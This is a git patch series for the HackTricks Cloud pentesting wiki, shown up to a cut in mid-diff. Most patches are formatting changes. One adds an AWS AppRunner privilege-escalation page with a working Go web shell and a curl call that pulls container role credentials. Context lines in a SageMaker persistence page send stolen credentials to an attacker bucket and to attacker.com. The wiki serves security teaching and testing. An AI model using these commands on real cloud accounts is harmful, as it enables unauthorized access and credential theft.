From 97759b6cecfc2a6d47babc37aee3d158745edbe5 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Thu, 31 Jul 2025 11:58:39 +0200 Subject: [PATCH 01/16] rm discount --- theme/ai.js | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/theme/ai.js b/theme/ai.js index 02f51127e..c09116c72 100644 --- a/theme/ai.js +++ b/theme/ai.js @@ -1,6 +1,6 @@ /** * HackTricks Training Discounts - */ + (() => { @@ -9,13 +9,13 @@ const TXT = 'Click here for HT Summer Discounts, Last Days!'; const URL = 'https://training.hacktricks.xyz'; - /* Stop if user already dismissed */ + # Stop if user already dismissed if (localStorage.getItem(KEY) === 'true') return; - /* Quick helper */ + # Quick helper const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css }); - /* --- Overlay (blur + dim) --- */ + # --- Overlay (blur + dim) --- const overlay = $('div', ` position: fixed; inset: 0; background: rgba(0,0,0,.4); @@ -24,7 +24,7 @@ z-index: 10000; `); - /* --- Modal --- */ + # --- Modal --- const modal = $('div', ` max-width: 90vw; width: 480px; background: #fff; border-radius: 12px; overflow: hidden; @@ -33,10 +33,10 @@ display: flex; flex-direction: column; align-items: stretch; `); - /* --- Title bar (link + close) --- */ + # --- Title bar (link + close) --- const titleBar = $('div', ` position: relative; - padding: 1rem 2.5rem 1rem 1rem; /* room for the close button */ + padding: 1rem 2.5rem 1rem 1rem; # room for the close button text-align: center; background: #222; color: #fff; font-size: 1.3rem; font-weight: 700; @@ -53,7 +53,7 @@ link.textContent = TXT; titleBar.appendChild(link); - /* Close "X" (no persistence) */ + # Close "X" (no persistence) const closeBtn = $('button', ` position: absolute; top: .25rem; right: .5rem; background: transparent; border: none; @@ -65,11 +65,11 @@ closeBtn.onclick = () => overlay.remove(); titleBar.appendChild(closeBtn); - /* --- Image --- */ + # --- Image --- const img = $('img'); img.src = IMG; img.alt = TXT; img.style.width = '100%'; - /* --- Checkbox row --- */ + # --- Checkbox row --- const label = $('label', ` display: flex; align-items: center; justify-content: center; gap: .6rem; padding: 1rem; font-size: 1rem; color: #222; cursor: pointer; @@ -83,7 +83,7 @@ }; label.append(cb, document.createTextNode("Don't show again")); - /* --- Assemble & inject --- */ + # --- Assemble & inject --- modal.append(titleBar, img, label); overlay.appendChild(modal); @@ -94,7 +94,7 @@ } })(); - +*/ From dbe2969386e6f661e7052c0b49f4afeab4af57d5 Mon Sep 17 00:00:00 2001 From: Tsubasa Irisawa Date: Fri, 1 Aug 2025 09:44:17 +0900 Subject: [PATCH 02/16] Add AWS AppRunner privesc page --- src/SUMMARY.md | 1 + .../aws-apprunner-privesc.md | 80 +++++++++++++++++++ 2 files changed, 81 insertions(+) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 5d6d5b740..02ee21711 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -267,6 +267,7 @@ - [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md) - [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md) - [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md) + - [AWS - AppRunner Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.md) - [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md) - [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md) - [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.md new file mode 100644 index 000000000..b7eb8326c --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.md @@ -0,0 +1,80 @@ +# AWS - AppRunner Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## AppRunner + +### `iam:PassRole`, `apprunner:CreateService` + +An attacker with these permissions can create an AppRunner service with an attached IAM role, potentially escalating privileges by accessing the role's credentials. + +The attacker first creates a Dockerfile that serves as a web shell to execute arbitrary commands on the AppRunner container. + +```Dockerfile +FROM golang:1.24-bookworm +WORKDIR /app +RUN apt-get update && apt-get install -y ca-certificates curl +RUN cat <<'EOF' > main.go +package main + +import ( + "fmt" + "net/http" + "os/exec" +) + +func main() { + http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { + command := exec.Command("sh", "-c", r.URL.Query().Get("cmd")) + output, err := command.CombinedOutput() + if err != nil { + fmt.Fprint(w, err.Error(), output) + return + } + + fmt.Fprint(w, string(output)) + }) + http.ListenAndServe("0.0.0.0:3000", nil) +} +EOF +RUN go mod init test && go build -o main . +EXPOSE 3000 +CMD ["./main"] +``` + +Then, push this image to an ECR repository. +By pushing the image to a public repository in an AWS account controlled by the attacker, privilege escalation is possible even if the victim's account doesn't have permissions to manipulate ECR. + +```sh +IMAGE_NAME=public.ecr.aws///:latest +docker buildx build --platform linux/amd64 -t $IMAGE_NAME . +aws ecr-public get-login-password | docker login --username AWS --password-stdin public.ecr.aws +docker push $IMAGE_NAME +docker logout public.ecr.aws +``` + +Next, the attacker creates an AppRunner service configured with this web shell image and the IAM Role they want to exploit. + +```bash +aws apprunner create-service \ + --service-name malicious-service \ + --source-configuration '{ + "ImageRepository": { + "ImageIdentifier": "public.ecr.aws///:latest", + "ImageRepositoryType": "ECR_PUBLIC", + "ImageConfiguration": { "Port": "3000" } + } + }' \ + --instance-configuration '{"InstanceRoleArn": "arn:aws:iam::123456789012:role/AppRunnerRole"}' \ + --query Service.ServiceUrl +``` + +After waiting for the service creation to complete, use the web shell to retrieve container credentials and obtain the permissions of the IAM Role attached to AppRunner. + +```sh +curl 'https:///?cmd=curl+http%3A%2F%2F169.254.170.2%24AWS_CONTAINER_CREDENTIALS_RELATIVE_URI' +``` + +**Potential Impact:** Direct privilege escalation to any IAM role that can be attached to AppRunner services. + +{{#include ../../../banners/hacktricks-training.md}} From ed2ae1e58f376756a92dbc2b37d087870be21ef4 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 1 Aug 2025 01:52:00 +0000 Subject: [PATCH 03/16] =?UTF-8?q?Add=20content=20from:=20AnsibleHound=20?= =?UTF-8?q?=E2=80=93=20BloodHound=20Collector=20for=20Ansible=20WorX=20and?= =?UTF-8?q?=20Tow...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/SUMMARY.md | 1 + ...ower-awx-automation-controller-security.md | 69 +++++++++++++++++++ .../concourse-architecture.md | 5 +- .../concourse-enumeration-and-attacks.md | 7 +- .../gh-actions-artifact-poisoning.md | 2 +- .../gh-actions-cache-poisoning.md | 2 +- .../gh-actions-context-script-injections.md | 2 +- .../aws-security/aws-persistence/README.md | 2 +- .../aws-sagemaker-persistence.md | 4 ++ .../aws-post-exploitation/README.md | 2 +- .../aws-macie-privesc.md | 1 + .../aws-sagemaker-privesc.md | 5 +- .../aws-workdocs-privesc.md | 3 + .../aws-security/aws-services/aws-ecr-enum.md | 5 +- .../README.md | 2 +- .../aws-inspector-enum.md | 5 +- .../aws-trusted-advisor-enum.md | 5 +- .../aws-waf-enum.md | 5 +- .../aws-services/eventbridgescheduler-enum.md | 5 +- .../az-post-exploitation/README.md | 2 +- .../az-function-apps-post-exploitation.md | 1 + .../az-privilege-escalation/README.md | 2 +- .../az-services/az-static-web-apps.md | 6 +- .../gcp-permissions-for-a-pentest.md | 3 + .../gcp-security/gcp-persistence/README.md | 2 +- .../gcp-post-exploitation/README.md | 2 +- .../gcp-cloud-functions-post-exploitation.md | 1 + .../gcp-add-custom-ssh-metadata.md | 5 +- .../gcp-serviceusage-privesc.md | 1 + .../gcp-security/gcp-services/README.md | 2 +- .../ibm-cloud-pentesting/README.md | 5 +- .../kubernetes-security/kubernetes-basics.md | 5 +- .../kubernetes-external-secrets-operator.md | 3 + .../kubernetes-kyverno/README.md | 3 + .../kubernetes-kyverno-bypass.md | 3 + .../kubernetes-opa-gatekeeper/README.md | 3 + .../kubernetes-opa-gatekeeper-bypass.md | 3 + ...bernetes-validatingwebhookconfiguration.md | 3 + .../openshift-pentesting/README.md | 3 + .../openshift-basic-information.md | 3 + .../openshift-jenkins/README.md | 3 + .../openshift-jenkins-build-overrides.md | 3 + .../openshift-privilege-escalation/README.md | 3 + .../openshift-missing-service-account.md | 3 + .../openshift-scc-bypass.md | 3 + .../openshift-tekton.md | 3 + .../openshift-pentesting/openshift-scc.md | 3 + 47 files changed, 178 insertions(+), 36 deletions(-) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 5d6d5b740..89ab818d4 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -227,6 +227,7 @@ - [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md) - [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md) - [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md) + - [Aws Sagemaker Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md) - [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) - [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) - [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md index 779443f10..36e6f6b53 100644 --- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md +++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md @@ -136,6 +136,75 @@ From a **white box security** review, you would need the **System Auditor role** +## Enumeration & Attack-Path Mapping with AnsibleHound + +`AnsibleHound` is an open-source BloodHound *OpenGraph* collector written in Go that turns a **read-only** Ansible Tower/AWX/Automation Controller API token into a complete permission graph ready to be analysed inside BloodHound (or BloodHound Enterprise). + +### Why is this useful? +1. The Tower/AWX REST API is extremely rich and exposes **every object and RBAC relationship** your instance knows about. +2. Even with the lowest privilege (**Read**) token it is possible to recursively enumerate all accessible resources (organisations, inventories, hosts, credentials, projects, job templates, users, teams…). +3. When the raw data is converted to the BloodHound schema you obtain the same *attack-path* visualisation capabilities that are so popular in Active Directory assessments – but now directed at your CI/CD estate. + +Security teams (and attackers!) can therefore: +* Quickly understand **who can become admin of what**. +* Identify **credentials or hosts that are reachable** from an unprivileged account. +* Chain multiple “Read ➜ Use ➜ Execute ➜ Admin” edges to obtain full control over the Tower instance or the underlying infrastructure. + +### Prerequisites +* Ansible Tower / AWX / Automation Controller reachable over HTTPS. +* A user API token scoped to **Read** only (created from *User Details → Tokens → Create Token → scope = Read*). +* Go ≥ 1.20 to compile the collector (or use the pre-built binaries). + +### Building & Running +```bash +# Compile the collector +cd collector +go build . -o build/ansiblehound + +# Execute against the target instance +./build/ansiblehound -u "https://tower.example.com/" -t "READ_ONLY_TOKEN" +``` +Internally AnsibleHound performs *paginated* `GET` requests against (at least) the following endpoints and automatically follows the `related` links returned in every JSON object: +``` +/api/v2/organizations/ +/api/v2/inventories/ +/api/v2/hosts/ +/api/v2/job_templates/ +/api/v2/projects/ +/api/v2/credentials/ +/api/v2/users/ +/api/v2/teams/ +``` +All collected pages are merged into a single JSON file on disk (default: `ansiblehound-output.json`). + +### BloodHound Transformation +The raw Tower data is then **transformed to BloodHound OpenGraph** using custom nodes prefixed with `AT` (Ansible Tower): +* `ATOrganization`, `ATInventory`, `ATHost`, `ATJobTemplate`, `ATProject`, `ATCredential`, `ATUser`, `ATTeam` + +And edges modelling relationships / privileges: +* `ATContains`, `ATUses`, `ATExecute`, `ATRead`, `ATAdmin` + +The result can be imported straight into BloodHound: +```bash +neo4j stop # if BloodHound CE is running locally +bloodhound-import ansiblehound-output.json +``` + +Optionally you can upload **custom icons** so that the new node types are visually distinct: +```bash +python3 scripts/import-icons.py "https://bloodhound.example.com" "BH_JWT_TOKEN" +``` + +### Defensive & Offensive Considerations +* A *Read* token is normally considered harmless but still leaks the **full topology and every credential metadata**. Treat it as sensitive! +* Enforce **least privilege** and rotate / revoke unused tokens. +* Monitor the API for excessive enumeration (multiple sequential `GET` requests, high pagination activity). +* From an attacker perspective this is a perfect *initial foothold → privilege escalation* technique inside the CI/CD pipeline. + +## References +* [AnsibleHound – BloodHound Collector for Ansible Tower/AWX](https://github.com/TheSleekBoyCompany/AnsibleHound) +* [BloodHound OSS](https://github.com/BloodHoundAD/BloodHound) + {{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md index ff5e35767..fc9888a4f 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md @@ -1,8 +1,10 @@ # Concourse Architecture +{{#include ../../banners/hacktricks-training.md}} + ## Concourse Architecture -{{#include ../../banners/hacktricks-training.md}} + [**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) @@ -38,4 +40,3 @@ In order to execute tasks concourse must have some workers. These workers **regi {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index cb128742a..42d6f75d4 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -1,8 +1,10 @@ # Concourse Enumeration & Attacks +{{#include ../../banners/hacktricks-training.md}} + ## Concourse Enumeration & Attacks -{{#include ../../banners/hacktricks-training.md}} + ### User Roles & Permissions @@ -437,9 +439,8 @@ Accept-Encoding: gzip. ## References -- https://concourse-ci.org/vars.html +- [https://concourse-ci.org/vars.html](https://concourse-ci.org/vars.html) {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md index 15c164233..6950cdd17 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md @@ -1,5 +1,5 @@ # Gh Actions - Artifact Poisoning - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md index 068050d0f..52f5ffccb 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md @@ -1,5 +1,5 @@ # GH Actions - Cache Poisoning - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md index d03be6f81..d9d11a81b 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md @@ -1,5 +1,5 @@ # Gh Actions - Context Script Injections - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md index c1a87add8..4b29e8919 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md @@ -1,5 +1,5 @@ # AWS - Persistence - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md index 4a002be55..87121602e 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md @@ -1,3 +1,6 @@ +# Aws Sagemaker Persistence + +{{#include ../../../banners/hacktricks-training.md}} # AWS - SageMaker Lifecycle Configuration Persistence @@ -157,3 +160,4 @@ aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload ``` +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md index b83383b2a..dd76b0935 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md @@ -1,5 +1,5 @@ # AWS - Post Exploitation - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md index b47f35d23..7c8f80a7c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.md @@ -35,3 +35,4 @@ However, a **bypass** has been identified where an attacker with sufficient perm **Summary:** This vulnerability allows an attacker with sufficient AWS IAM permissions to recover previously detected secrets even after the original file has been deleted from S3. If an AWS secret key, access token, or other sensitive credential is exposed, an attacker could leverage this flaw to retrieve it and gain unauthorized access to AWS resources. This could lead to privilege escalation, unauthorized data access, or further compromise of cloud assets, resulting in data breaches and service disruptions. +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index 29bbc001d..d2d52480e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -1,8 +1,10 @@ # AWS - Sagemaker Privesc +{{#include ../../../banners/hacktricks-training.md}} + ## AWS - Sagemaker Privesc -{{#include ../../../banners/hacktricks-training.md}} + ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` @@ -114,4 +116,3 @@ _I haven't exploited because of the lack of time, but looks similar to the previ {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md index 4b1e5e7e9..129cac049 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md @@ -1,5 +1,7 @@ # AWS - WorkDocs Privesc +{{#include ../../../banners/hacktricks-training.md}} + ## WorkDocs For more info about WorkDocs check: @@ -54,3 +56,4 @@ I didn't find any way to do this from the cli. +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md index 9025829b4..043c1e63e 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -1,8 +1,10 @@ # AWS - ECR Enum +{{#include ../../../banners/hacktricks-training.md}} + ## AWS - ECR Enum -{{#include ../../../banners/hacktricks-training.md}} + ### ECR @@ -103,4 +105,3 @@ In the following page you can check how to **abuse ECR permissions to escalate p - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md index 4ef6b9d8d..fd99d6acf 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md @@ -1,5 +1,5 @@ # AWS - Security & Detection Services - +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md index 655b81fa7..99e043b2f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md @@ -1,8 +1,10 @@ # AWS - Inspector Enum +{{#include ../../../../banners/hacktricks-training.md}} + ## AWS - Inspector Enum -{{#include ../../../../banners/hacktricks-training.md}} + ### Inspector @@ -387,4 +389,3 @@ aws inspector2 untag-resource --resource-arn --tag-keys - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md index a975d7476..4eb01865f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -1,8 +1,10 @@ # AWS - Trusted Advisor Enum +{{#include ../../../../banners/hacktricks-training.md}} + ## AWS - Trusted Advisor Enum -{{#include ../../../../banners/hacktricks-training.md}} + ## AWS Trusted Advisor Overview @@ -72,4 +74,3 @@ AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, perform - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 661b836d5..b5fc9a57c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -1,8 +1,10 @@ # AWS - WAF Enum +{{#include ../../../../banners/hacktricks-training.md}} + ## AWS - WAF Enum -{{#include ../../../../banners/hacktricks-training.md}} + ## AWS WAF @@ -472,4 +474,3 @@ aws wafv2 untag-resource --resource-arn --tag-keys - diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md index 3bde2e254..10a94bc14 100644 --- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md @@ -1,8 +1,10 @@ # AWS - EventBridge Scheduler Enum +{{#include ../../../banners/hacktricks-training.md}} + ## EventBridge Scheduler -{{#include ../../../banners/hacktricks-training.md}} + ## EventBridge Scheduler @@ -82,4 +84,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 43798c4bf..234962b1c 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -1,5 +1,5 @@ # Az - Post Exploitation - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md index 2c254db40..fca69ffdf 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md @@ -19,3 +19,4 @@ For more information about function apps check: +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md index 6e0dca199..0e9f547ca 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md @@ -1,5 +1,5 @@ # Az - Privilege Escalation - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md index 352c662b5..42f47a0b3 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md @@ -1,7 +1,10 @@ +# Az Static Web Apps + +{{#include ../../../banners/hacktricks-training.md}} # Az - Static Web Apps -{{#include ../../../banners/hacktricks-training.md}} + ## Static Web Apps Basic Information @@ -202,4 +205,3 @@ All the information about privilege escalation and post exploitation in Azure St - [https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans](https://learn.microsoft.com/en-us/azure/app-service/overview-hosting-plans) {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md index 4aa176582..908270b0b 100644 --- a/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md +++ b/src/pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md @@ -1,5 +1,7 @@ # GCP - Permissions for a Pentest +{{#include ../../banners/hacktricks-training.md}} + If you want to pentest a GCP environment you need to ask for enough permissions to **check all or most of the services** used in **GCP**. Ideally, you should ask the client to create: * **Create** a new **project** @@ -144,3 +146,4 @@ roles/bigquery.metadataViewer ``` +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/README.md b/src/pentesting-cloud/gcp-security/gcp-persistence/README.md index e6fa4ba64..3327690ac 100644 --- a/src/pentesting-cloud/gcp-security/gcp-persistence/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-persistence/README.md @@ -1,5 +1,5 @@ # GCP - Persistence - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index 381b119b8..e24133696 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -1,5 +1,5 @@ # GCP - Post Exploitation - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md index ce93c049c..9d39a5623 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md @@ -128,3 +128,4 @@ def injection(): +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md index 381870b67..88d015455 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md @@ -1,8 +1,10 @@ # GCP - Add Custom SSH Metadata +{{#include ../../../../banners/hacktricks-training.md}} + ## GCP - Add Custom SSH Metadata -{{#include ../../../../banners/hacktricks-training.md}} + ### Modifying the metadata @@ -100,4 +102,3 @@ It's possible to broaden the reach of SSH access to multiple Virtual Machines (V {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md index 55585de79..e29933d2f 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md @@ -58,3 +58,4 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/README.md b/src/pentesting-cloud/gcp-security/gcp-services/README.md index d384117e2..c1f2ab867 100644 --- a/src/pentesting-cloud/gcp-security/gcp-services/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/README.md @@ -1,5 +1,5 @@ # GCP - Services - +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/README.md b/src/pentesting-cloud/ibm-cloud-pentesting/README.md index 38f5c3c68..7f62ffb66 100644 --- a/src/pentesting-cloud/ibm-cloud-pentesting/README.md +++ 